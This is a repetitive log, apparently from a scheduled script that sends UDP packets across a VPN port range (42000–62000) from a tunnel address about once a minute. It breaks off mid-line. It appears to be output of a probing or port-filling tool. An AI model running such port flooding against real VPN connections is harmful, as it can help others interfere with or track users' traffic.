2020-09-06 12:20:04 +Starting port fill at 2020-09-06 12:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:21:05 +Starting port fill at 2020-09-06 12:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:22:05 +Starting port fill at 2020-09-06 12:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:23:06 +Starting port fill at 2020-09-06 12:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:24:05 +Starting port fill at 2020-09-06 12:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:25:05 +Starting port fill at 2020-09-06 12:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:26:05 +Starting port fill at 2020-09-06 12:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:27:06 +Starting port fill at 2020-09-06 12:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:28:04 +Starting port fill at 2020-09-06 12:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:29:05 +Starting port fill at 2020-09-06 12:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:30:04 +Starting port fill at 2020-09-06 12:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:31:05 +Starting port fill at 2020-09-06 12:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:32:04 +Starting port fill at 2020-09-06 12:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:33:05 +Starting port fill at 2020-09-06 12:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:34:06 +Starting port fill at 2020-09-06 12:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:35:04 +Starting port fill at 2020-09-06 12:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:36:04 +Starting port fill at 2020-09-06 12:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:37:04 +Starting port fill at 2020-09-06 12:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:38:04 +Starting port fill at 2020-09-06 12:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:39:06 +Starting port fill at 2020-09-06 12:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:40:05 +Starting port fill at 2020-09-06 12:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:41:07 +Starting port fill at 2020-09-06 12:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 